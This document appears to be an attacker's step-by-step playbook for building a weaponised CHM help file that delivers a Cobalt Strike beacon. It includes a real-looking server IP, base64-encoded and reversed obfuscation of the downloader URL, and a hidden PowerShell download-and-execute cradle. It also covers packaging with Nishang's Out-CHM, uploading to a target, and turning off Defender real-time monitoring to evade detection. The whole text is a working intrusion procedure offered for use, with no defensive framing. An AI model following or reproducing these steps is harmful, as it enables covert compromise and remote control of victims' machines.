Step 1. In Cobalt Strike create a scripted web delivery
Step 2. take URL to downloader and run thru cyberchef, first make sure it is base64 encoded then apply the reverse filter
		-https://210.210.205.111:80/MSForms (Plaintext url)
		-aHR0cDovLzIxMC4yMTAuMjA1LjExMTo4MC9NU0Zvcm1z (Normal Base64 enc URL)
		-z1mcvZ0UN9CM4oTMxEjL1AjMuATMy4CMxIzLvoDc0RHa (reversed base64 enc URL)

Step 3. Take reverse b64 encoded url and place in payload.ps1 on line 11
		-$Watasenia_scintillans = 'z1mcvZ0UN9CM4oTMxEjL1AjMuATMy4CMxIzLvoDc0RHa'
Step 4. Take Plaintext URL and place in payload.ps1 on line 16 
	
		-$Sepia_latimanus = "powershell -NoP -W Hidden -c #d#iex ((New-Object Net.WebClient).DownloadString(#d#http://210.210.205.111:80/MSForms#d#)#d#"
	
	Make sure you preserve the #d# on both sides of the plain URL since those get str replaced by double quotes at execution

Step 5. Open Out-CHM.ps1 and load the module. (https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1)

Step 6. Run the following command 	
		- Out-CHM -HHCPath 'C:\Program Files (x86)\HTML Help Workshop' -PayloadScript D:\VSCode\Powershell\Payload.ps1
			
		(youll wanna make sure you have HTML Help Workshop installed, real easy to install from MS)


Step 7. Should be good to ZIP and upload now on to target.

Step 8. When your on the target you want youll need to pop a admin powershell instance to disable AMSI 
		- Set-MpPreference -DisableRealtimeMonitoring $true
	
	If cato has a good bypass for it i can add it in so we can skip this step.

Step 9. once AMSI is disabled you can unzip the file on the target and run it. should receive a callback in CS.




